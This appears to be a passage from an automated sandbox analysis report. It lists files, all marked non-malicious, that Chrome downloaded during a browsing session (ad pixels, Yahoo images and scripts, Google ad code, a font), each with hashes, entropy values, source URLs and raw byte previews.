                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://sync.srv.stackadapt.com/sync?nid=114&gdpr=0&gdpr_consent=&gpp=&gpp_sid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=medianet&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=3714164676390569000V10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4251
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.929723255143754
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:IqQDUBKTuBVrN2Dc4tR/HAwaHEIkVZdBrc2nPatF:IL4cTIB8c4n/HbIegdF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AE64499C8825452F6262177EE6DD525B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:92A35E0817CEFB5BEFBB18422FB4C9D220F6754C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:47FB417F6B72C4EDC08DFB90A376B2C88B3B51992BF3C83DD14E011EDBA2F339
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1A776374F3C20D16BF0C84DBB28A6CA3D0A110CA928AA87F56D79D09B898091B84F4D3EA164A6C79DB0C9FEDEB66167BD83B854267C2870394F70DC536117441
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/74.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq....bIDATx^.yTTW..s....9s..9=....c.Y..%.IL.m;.I..N.L'.....l.D.Ck4.B#...$QQ .d\@D..(...(.....E.$.....>^...("Iw.....y.........^..a.o.|.H.x1=9...AB....a_.#..o.mK..]...J.....#i.G.%#.O+G..0JOT.....a..c4.|.s....k..Q...M..x...`2..).W...R8....8.....!_./.DO.yc$e...`.J87.!.'..7..M...V...M.g.....p-..7....oz'.......+N....'...h].....-.&.....l.....|g.t|.h].P..y.pa..>F.S...?F........... &.&.;.-=)r....p...*>...[H.i..dJ4....3h.J........C,.I.......'....HZ>R...#[.R......c......,(.F.rfP....@..q.X.r.........].H.>..zf@.F..H.'T.y7.........Y.g...qHM..6q0...k.......\7x....M..?.r...l.m.k<7@L.....]..T.....~..i/..h*.C...a.K.3.S..I.*.M......NfF..Q..c.....&e...iOl8.e>...-.O....|.7 7S.}!.L...2W.MLx....(*.?..o.C...0...m].F.3...1..J........2O..'v....e...X...P....daK`qN4Y.^.S.(..a....G....Ty\Q.g.do4.Z......m.;......8........a..N.......%R....RR..#.:/...a.vVkd.....v[.....v5..P....q...Fy.V.'o..........:mX..:.y.e%L..$..-1..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.872912793337745
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:wNYNMtKweX2pw5nqNjcrAeNrjYvg+R/LHdaJkK5pRdKEVJ5bb6iuK8B1H:sYNg7w2yqNwrAU8bLQmK5prV6hn1H
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9D9D3B0522A78E1DFB5B6A25ED20B912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:295E4DC1A7C570445B2FFF50665F16CFD8FEB4F0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D7D7015CD5FE25D91C2236278BF91FC929D143EA0F11F33CEB834BEBFC43912B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:23D73A59D2D2689E865223F030D93A8CFB7A709417C69EB200DFEE7994056A0884CE7839EC62784E64C5BA8046414FF8B9375B3F8A1B6B891BC8DDB46ED27412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uu/api/res/1.2/sirEetD8VsuRx6m97CC1UA--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/ff4bcc10-81a1-11ef-adf9-70085f4f49b1.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFF.4..WEBPVP8X.... ...+.....ICCPH......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 536x284, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):23746
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9927121541991175
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:Rzq4PYQvNKeZaFCt1m/oZmrs+T7d1HZtA8mlpUX6cCr8LXKiH9RyhLSP2:RzLVKeUu1d0R15TmlmXKrAKiQxN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8162ED09FA11904DCD84EC39C21A5963
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1CC944CB8FDD93DC8E39E55ABB270112BF7D894D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:70C1455CEF1A6DA9ACC11BC1079170DB11F51F4DEE3D77E5715C92552573C34D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6D98DF346E14DFA2B3F736CA6C9FD5597F4DB049151EFAEDA488932645E6D2D1CB4E543D0806946884D43179ED4E2434918FB2435A6EE0A167F22265A294B2D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uu/api/res/1.2/JjtDc3_w.qhGQrf4A_jcxA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/miami_herald_mcclatchy_975/e866e6133d9de1f7a90c43f44013066c.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFF.\..WEBPVP8 .\..pY...*....>y8.H$."'.......gmS..K.<+.6'.t..KP..p.)w.ra....'......Q.s._......G._.<B=....7.a.._...y...@o.>....Q.....K........g.$i..c;..._.T.z.G*o../....H....._....aCM]......r.>@.....!..ib$....?......K..,...x]......U.@..8J....{J]..j,?..XGVL+O..hvG....,..Tg.i.mN.B.c...@|T...\.@#..T.}.Jy.K.'V+...]..0U....... ..@...u.q$D........i.l>....j...U9.....#.O.....0)8..J5..iBm....{..T..N.......X....BM.5.M7....},....%........^.N1..(......|wC..>}3iX.......G=...k..........9.O.GS...e..!.Ph./@0.kF:.}.ic.I..)....;.[iEV.].....;..q.L.U..+.......j..].C...S....X.`.....A.`.>.d......3[q..6..7E(P._..7,..Q.....|...RXP..jO..^.iL...K....c.....<.L..&.(.1G...A!..{T.s.5.xt..<s...W.6.?gE.>yn*.=.}....7.v.....4~...B....j6a....@.'Wf.U.../...M.....7.v....|...6.`k.>.C...^.S....v..8...F.P..TK....#.Ev:..&J'....".Q=.>hgy..B/.=..h...@6.7rYy..Cr........7\SS..b..N@.K.k.}.*..8....1...@...<....K\...l.~F."...N]_W(].:.`\U.Ho(o8I~.#.}..<....<B..,..]...[g._..|...WC).k...O.rw..N.f.$1Fk.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (64561)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):494354
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.505846375527451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6144:VArhbX/q8//4a+kOcO71c6OyBQxkd2SekeofTNTga5zV/iGcN7LgPuW4zEhFV/uO:qlAr9Oyaa/eggsVtkQPRm7j2VE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2F8287CDD69B88555206A23C7DC2ECB7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B59389B66385EBDA785016AE6A0E8443C9294434
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:687524CDE30FE73542B07A1B40A9E4217E6080CA31489A89C22F027FB758F8E7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:72B280253AD33468A4BFC0F236930657236D0A00D011B30BBF1FC72F57CA3FCB2F7CC6E8328EA26D2D6214D38CE7FF76F733175A15C7EECBE2A6EF343EBD9FCD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(_){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . . Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and contributors . Licensed under the Apache License, Version 2.0 (the "License"); . you may not use this file except in compliance with the License. . You may obtain a copy of the License at . http://www.apache.org/licenses/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software . distributed under the License is distributed on an "AS IS" BASIS, . WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. . See the License for the specific language governing permissions and . limitations under the License. .*/ ./* . .Math.uuid.js (v1.4) .http://www.broofa.com .mailto:robert@broofa.com .Copyright (c) 2010 Robert Kieffer .Dual licensed under the MIT and GPL licenses. .*/ .var ba,ea,ja,xa,za,Ca,Ia,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2586)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):22537
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.532860985165806
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:4qEMQl6FtO53n+8svyf53Fo5oeHvVFBIuwRatEDTJi/EDdBC6ZcuLI4Xhw/XgsB6:4qEMQlwOFn+DCFoeeFqYt2TJisnC6ZcU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:38D4F310E650C3877EB2E2C55860F77B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:41D2F4BD61DF909B531BF54EC54AB66CFC8712CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C6F4951F54B1F8F2F57A668518D6EBC3D94ABF1A1A1ACA440DE486B13D02D85D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:037D0A44AD44D3934029F40997165FB3F690D0C5804BF8EFBD1DC4928258A963D6F7B60D761C17E1BFE581EEEF9C58C58C6E85BF983E4203165F61939FBEE440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://tpc.googlesyndication.com/pagead/js/r20241003/r20110914/client/qs_click_protection_fy2021.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this||self;function ea(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=ea;return p.apply(null,arguments)}function fa(a,b){function c(){}c.pr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.858713645475351
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:KYNg70Ool8Hq1mc/Hp8e9yl0ScOcX/OZVX5yTAyMN1y8UhG4BJQj:KYygOo6Hrc/HGe9Tti7V/NUXQi2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9AE73F83C673980BD3B041B11B9CF2FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0BDBABF3310D68DC6408232E2FC830E0A38C73EB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:505D7B4E123B142555CD895A1A1D58548D70DD696CF740E6E8A6554F2CBFDAE6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2A141BAB8EB607114760AF5E7DBB5176EEFDA454F5CEE46682D83EDBDF34CD7E082CB8D2FD6052E39BB5482376EA07C436A6B88DA724769DCBA565CA26CBEBF2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (7907), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7907
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.134832253452516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:3NiauurulAaIgvP+85ntzZSNLcVNHrjOO:3yuqlPI8Z3NsYVhrjr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:85070595D47A7CC86AF31833110DC18A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:13564B6787EE765D841B2B6D1C4A6E73A2553AF8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:79D954B80C39513A18EE1E0143D931BA9222B4C4794438F7BAD23F9E0380CDC8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B89211958F1EC914F3C31363EC7A60EFF460A86EAEF594522FD11A75712E0D0B05918C1D3FC720DD5D970399CD59C45E2F0069C5A9AE8014253661A2CEDABD38
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-template-1.4.3-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-template",[],t):"object"==typeof exports?exports["wafer-template"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-template"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):33207
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.82959682491047
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:heUACPGrCB3Sxq4G23q0ADnDlk3JQyurOLky7PY1DdPO84sKIoyAbS:+3MXy7PY15r+bS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:334A56789B3BAD544EA851587BC39F29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:713617EA8E322BD7E0770F1CFDD9DC2D8F8C166D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E78311225D3827B1CD89E8908B95466EBE4EFCA2DCC64201DBF3FC5945496222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9DE449DCB831D1DF78949D6D6B383C13427C27B200E257E9815F429ABAEEDC8570204D3FDB69923D3CF4BB8A6C456352373F30A99A158B3D10F6BA1E67777306
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"/22888152279/us/yfin/screen/dt/us_yfin_screen_dt_top_center":["html",1,null,null,1,1,1,0,0,null,null,1,1,[["ID=df79119a1fa99ad7:T=1728414948:RT=1728414948:S=ALNI_MYKT0l52fOIxDovQbfG6R2Htk9yFQ",1762110948,"/","yahoo.com",1],["UID=00000f31c5f3ddbd:T=1728414948:RT=1728414948:S=ALNI_MZvM4QgeHSFP5DpKc63akcsfeYVow",1762110948,"/","yahoo.com",2]],[138466991195],[6636161008],[5462617191],[3473808467],null,null,null,null,null,null,null,1,null,null,null,null,null,null,"AOrYGsnlWVSn9Oqo2_yvtTFyf-Gv_5vbpy_etF-qN9IzYmgOODCHriTiKQumJS-8u9K4WbWZTLQ13SEz238lFDzRt0TESLRV35MknvGqMtR5B7FzbvG5","CPuTq7i__4gDFdSKgwcd1yAxgg",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"2",null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,[["ID=f5f929b700e0cc1f:T=1728414948:RT=1728414948:S=AA-Afjb0impeShT5Xn7Rm44gzv2S",1743966948,"/","yahoo.com"]],[]]}.<!doctype html><html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):122423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.305704376297342
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:r4g3D3Aeq/dcMxv4IczaOil5dHpTGQHamSWiEmP72jdHrN42WdO7deK5YECDPE5W:y2D7udLN42WdO7deKw60jAeYv7k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6351528876ADA81CA05ADCFC0BC8EF9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:553E048314BE144063AB59D01E35586F1C65228D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:498E5C1BF76F15E724968BE0AEE53BF4269B550BE0FE23A518AD0DFCB5A501B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3F4A87F9FBE5143C7639CACE8BD85BCC94C5BCC05F34173D78C641712D52CB046C9C14CC821FECD2FA2426D0C899647A13B31629589C1C15262B9D442DF62A64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("CAAS",[],t):"object"==typeof exports?exports.CAAS=t():e.CAAS=t()}(self,(function(){return function(){var e,t,s,o,a={"./node_modules/@vzmi/caas-static/src/lazy/js/index.js":function(e,t,s){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s("./node_modules/@vzmi/caas-static/src/util/js/index.js");const a="loading"in HTMLImageElement.prototype,i="data-caas-lazy-loading-init";let n,l;function r(e,t){return e.nodeName.toLowerCase()===t}function d(e,t){const s=e._util,{pendingClass:a}=e.options;return()=>{if((0,o.elementInView)(t,e.options,s._viewport)){const o=s.elements.indexOf(t);e.load(t),s.elements.splice(o,1),s.count--,0===s.count&&e.destroy()}(0,o.removeClass)(t,a)}}function c(e){const t=e._util,{pendingClass:s,successClass:i,timeout:n}=e.options;for(let l=0;l<t.count;l++){const c=t.elements[l],m=a&&r(c,"img"),u=!m&&(0,o.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 32744, version 0.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):32744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9854035944607755
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:d7leJ/zZh5MW70VeyusacxuwBPRlpoJUZj++g/6PoDa:ba7jm60Vey7drR15jtou
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:029D572444DF549AB0356F105D2981E5
